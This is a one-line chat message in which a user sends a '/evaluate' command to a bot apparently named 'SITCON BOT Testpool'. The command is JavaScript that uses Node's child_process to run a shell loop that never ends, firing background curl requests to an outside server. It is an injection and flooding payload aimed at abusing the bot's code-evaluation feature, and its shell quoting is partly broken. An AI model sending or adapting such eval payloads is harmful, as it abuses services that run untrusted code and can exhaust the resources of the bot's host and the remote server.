Jasper Yu says to SITCON BOT Testpool
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=$((date '+%s%N' | cut -b1-13)); c=0; while true; do i=$(($c + 1)); s=$(($((date '+%s%N' | cut -b1-13)) - $initdate));curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});